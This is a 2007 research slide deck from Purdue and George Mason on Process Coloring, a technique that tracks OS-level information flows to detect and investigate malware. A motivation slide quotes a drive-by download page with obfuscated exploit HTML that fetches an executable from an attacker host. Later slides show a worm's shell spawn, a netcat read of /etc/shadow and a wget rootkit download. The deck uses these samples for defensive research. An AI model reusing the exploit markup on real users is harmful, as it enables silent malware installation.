360 likes | 525 Views
NICIAR Site Visit, West Lafayette , IN, July 19, 2007. Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu (Presenter) Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS)
E N D
NICIAR Site Visit, West Lafayette , IN, July 19, 2007 Process Coloring: an Information Flow-Preserving Approach to Malware Investigation Eugene Spafford, Dongyan Xu(Presenter) Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University Xuxian Jiang Department of Information and Software Engineering George Mason University
Motivation • Internet malware remains a top threat • Malware: virus, worms, rootkits, spyware, bots…
Motivation • Upon Clicking a malicious URL • http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html • Result: <html><head><title></title></head><body> <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style> <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try{ document.write('<object data=`ms-its: mhtml:file: //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){}</script> </body></html> MS05-002 MS03-011 MS04-013 22 unwanted programs are installed without user’s consent!
Our Challenge: Enabling Timely, Efficient Malware Investigation • Raising timely alert to trigger a malware investigation • Identifying the break-in point of the malware • Reconstructing all contaminations by the malware Break-in point Break-in point trace-back Contamination reconstruction Log Log External detection point Infection Detection Time Today’s log-based intrusion investigation tools (e.g., BackTracker, Taser)
Limitations of Today’s Tools • Long “infection-to-detection” interval • Entire log needed for both trace-back and reconstruction • Questionable trustworthiness of log data Break-in point Break-in point trace-back Contamination reconstruction Log ? Log ? External detection point Infection Detection Time Existing log-based intrusion investigation tools
Goals of Research • Improve malware defense capabilities of enterprise computing infrastructure: • Detection of malware activity • Identification of vulnerable programs/applications • Accountability of computation activities • Recoverability from malware contaminations • Proactive protection of sensitive information/data • Demonstrate via success metrics with respect to: • Timeliness • Efficiency • Accuracy
Goals of Research • Goals fit within NICECAP research themes • “Accountable information flows” • Based on information flow theory • Instantiated at operating system level • Holding malware accountable • “Large-scale system defense” • Targeting large-scale malware infection (e.g., botnets) • Enabling malware detection and remediation • Providing first line of response (applicable to legacy applications w/o source code)
Log Technical Approach: Process Coloring • Key idea: propagating malware break-in provenance information (“colors”) along OS-level information flows • Existing tools only consider direct causality relations without preserving and exploiting break-in provenance information Virtual Machine … Log Monitor Apache MySQL DNS Sendmail Attacker Guest OS Logger Virtual Machine Monitor (VMM) Runtime alert triggered by log color anomalies
New Capabilities of Process Coloring • Color-based malware warning (vs. external detection point) • Color-based break-in point identification (vs. back-tracking) • Color-based log partitioning (vs. entire log) for reconstruction Break-in point Contamination reconstruction Time Infection Detection
Impact of Success • How will it benefit the NIC? • Accountability of NIC cyber infrastructure • Readiness against current and emerging malware threats (e.g., botnets, rootkits, spyware) to NIC • Protection of NIC critical data, information, and computation activities • Reduction of NIC human labor in malware investigation
Impact of Success • How will it benefit the IA Community • Systematic model for OS-level information flows • Mechanisms and policies for elevated accountability of commodity OS • Tools and methods for malware alert, investigation, and recovery • Artifacts, data, insights and lessons for further malware research
Sample Scenario Question 2: How does the malware break into the system? Question 3: What does the malware do after break-in? • /etc/shadow • Confidential Info httpd httpd netcat /bin/sh Local files Alert Question 1: How is the malware detected? wget Root kit
Existing Approach 1. Online log collection Log “/bin/sh” CREATES a new process “netcat” “netcat” READS “/etc/shadow” file “httpd” READS an incoming request • /etc/shadow • Confidential Info httpd httpd netcat “/bin/sh” MODIFIES local files /bin/sh “httpd” CREATES a new process “/bin/sh” Local files External detection point Alert “/bin/sh” CREATES a new process “wget” wget Root kit “wget” CREATES local file(s) - “Root kit”
Existing Approach 1. Online log collection “httpd” CREATES a new process “/bin/sh” 2. Offline backward tracking Log “wget” CREATES local file(s) - “Root kit” “/bin/sh” CREATES a new process “wget” Break-in Point ! httpd /bin/sh External detection point Alert wget Root kit Backward Tracking [King+, SOSP’03]
Existing Approach 1. Online log collection 2. Offline backward tracking Log “netcat” READS “/etc/shadow” file 3. Offline forward tracking “/bin/sh” CREATES a new process “netcat” Break-in Point ! • /etc/shadow • Confidential Info httpd netcat “/bin/sh” MODIFIES local files Forward Tracking /bin/sh “httpd” CREATES a new process “/bin/sh” Local files External detection point Alert “/bin/sh” CREATES a new process “wget” wget Root kit “wget” CREATES local file(s) - “Root kit”
Process Coloring Approach Capability 1: Color-based malware warning 1. Initial coloring s30sendmail s30sendmail s55sshd s55sshd Log s45named s45named init rc s80httpd s80httpd • /etc/shadow • Confidential Info httpd netcat Capability 3: Color-based log partition for contamination analysis /bin/sh Local files Capability 2: Color-based identification of break-in point 2. Coloring diffusion wget Root kit
Timeliness by Process Coloring:Color-Based Malware Warning ... BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5 BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800 BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25 BLUE: 673["sendmail"]: 6_close(5) = 0 BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0 ... RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5 RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11 RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40 RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090 … RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21 RED: 2568["httpd"]: 63_dup2(5, 2) = 2 RED: 2568["httpd"]: 63_dup2(5, 1) = 1 RED: 2568["httpd"]: 63_dup2(5, 0) = 0 RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000) RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2 RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6 Capability 1: Color-based malware warning: “unusual color inheritance”
httpd index.html index.html Timeliness by Process ColoringColor-Based Malware Warning • Another example: “color mixing” RED: 1234 ["httpd"]: … RED: 1234 ["httpd"]: … RED: 1234 ["httpd"]: … RED+BLUE: 1234 ["httpd"]: system call to read file index.html httpd bind cp defaced.html index.html
Efficiency by Process Coloring Capability 2: Color-based break-in point identification Capability 3: Color-based log partitioning
Accuracyby Process Coloring • Accuracy of color-based malware warning • False positives and false negatives • Accuracy of malware contamination reconstruction • Sufficiency of log partition (“no useful log entries left out”) • Compare malware action graphs with published malware analysis report • Limitation of causality-based reconstruction algorithms (e.g., BackTracker, Taser)
inet_sock(80) recv 2568: httpd accept execve fd 5 dup2, read 2568(execve): /bin//sh execve 2568(execve): /bin/bash -i fork, execve fork, execve 2586: /bin/rm –rf /tmp/.bugtraq.c 2587: /bin/cat open, dup2, write unlink /tmp/.uubugtraq /tmp/.bugtraq.c Accuracy of Malware Contamination Reconstruction: the Slapper Worm Example
create, mkdir, link create <s1, o1> color(o1) = color(s1) CREATE fork, vfork, clone create <s1, s2> color(s2) = color(s1) color(s1) = color(s1)υcolor(o1) read <s1, o1> read, readv, recv READ read <s1, s2> ptrace color(s1) = color(s1)υcolor(s2) color(o1) = color(s1)υcolor(o1) write <s1, o1> write, writev, send WRITE write <s1, s2> Ptrace, wait, signal color(s2) = color(s1)υcolor(s2) destroy <s1, o1> unlink, rmdir, close DESTROY destroy <s1, s2> exit, kill Research Task I: Color Diffusion Model (Month 1-6) • Color Diffusion Model • OS-level Information Flows syscalls Operation Diffusion
Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18) • Server-side malware investigation • Consolidated server environment with independent server applications • “Clustered” information flows partitioned by server applications • Color mixing highly unlikely between applications • Client-side malware investigation • Inter-dependent client applications (e.g., text editor compiler; latex dvips ps2pdf) • More inter-application information flows • Legal color mixing exists
+ FTP FTP Quick Tax Quick Tax Research Task II: Process Coloring for Client and Server Side Malware Investigation (Month 2-18) • A motivating example of client-side process coloring Time
Research Task III: Color Mixing Handling via Information Flow Control(Month 7-18) • Profiling legal color mixing inside a client host • Shared files • Helper processes • Approach 1: information flow insulation • Approach 2: information flow border control P1 P2 P2 P1 P2 Shared file Shared file Shared File Insulated
Related Work Based on Information Flows • Instructionlevel information flows • Lacking system-wide semantic information (e.g., info. about processes and files) • Language level information flows • Focusing on information flows inside a program • Operating system level information flows • Complementing the above categories • Revealing system-wide semantic information • Benefiting detection, recovery, and forensics as first line of defense
Metrics: Definitions • Timeliness • Malware infection-to-warning interval • Efficiency • Percentage of log reduction for malware contamination reconstruction • Accuracy • False positive rate of malware warning • False negative rate of malware warning • Correctness of malware action graphs
Metrics: Evaluation Plan • Sources of malware • Repository of malware (worms, botware, rootkits) • Malware captured by honeypots and honeyfarm • Target computing environments • Consolidated servers • Clients • Experiment environments • VM-based honeyfarm (Collapsar) • VM-based malware playground (vGround) • Methodology: Evaluate by comparison • With process coloring • Without process coloring
Project Organization and Management • Purdue Team • Faculty • Eugene Spafford • Dongyan Xu • Graduate students • Ryan Riley • Larissa O’Brien • TBD • Budget • $xxx,xxx • George Mason Team • Faculty • Xuxian Jiang • Graduate student • TBD • Budget • $xxx,xxx
Project Organization and Management June 7th, 2007 Quarterly Program Reviews Site Visit Tasks 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 1. Task I (Section 3.1) 2. Task II (Section 3.2) 2.1 Subtask II.1 2.2 Subtask II.2 2.3 Subtask II.3 - 3. Task III (Section 3.3) - 3.1 Subtask III.1 3.2 Subtask III.2 3.3 Subtask III.3 . 4. Meetings and Document Prep 5. Prototype Instantiation #1 #2 #3 Software Deliverable Experiments Software Demonstrations Basic Xen-based prototype Tools for malware investigation Mechanisms for color mixing control
Project Organization and Management • Spending during Summer’07: • Purdue: One month graduate student support (half-time) • GMU: One month summer salary (planned)
June 7th, 2007 Quarterly Program Reviews Site Visit Tasks 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 1. Task I (Section 3.1) 2. Task II (Section 3.2) 2.1 Subtask II.1 2.2 Subtask II.2 2.3 Subtask II.3 - 3. Task III (Section 3.3) - 3.1 Subtask III.1 3.2 Subtask III.2 3.3 Subtask III.3 . 4. Meetings and Document Prep 5. Prototype Instantiation #1 #2 #3 Software Deliverable Experiments Software Demonstrations Recent Progress • We are here • Identifying color diffusion operations in Linux OS • Starting to implement log coloring and collection on Xen VMM
June 7th, 2007 Quarterly Program Reviews Site Visit Tasks 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 1. Task I (Section 3.1) 2. Task II (Section 3.2) 2.1 Subtask II.1 2.2 Subtask II.2 2.3 Subtask II.3 - 3. Task III (Section 3.3) - 3.1 Subtask III.1 3.2 Subtask III.2 3.3 Subtask III.3 . 4. Meetings and Document Prep 5. Prototype Instantiation #1 #2 #3 Software Deliverable Experiments Software Demonstrations Projected Progress in the Next 3-6 Months • 11/21/07: A comprehensive color diffusion model under Linux • 12/07/07: Demo and software release of basic Xen-based prototype
Technology Transfer Plan • Potential adopters • Computer forensics/malware investigators and researchers • System administrators • Anti-malware software companies • Open source communities (e.g., XenSource) • Software release and documentation • Presentations and demos to potential NIC adopters • Presentations and demos to anti-malware software companies (Symantec, Microsoft, VMware)
Thank you! For more information about the ProcessColoring project: http://cairo.cs.purdue.edu/projects/pc PC@cs.purdue.edu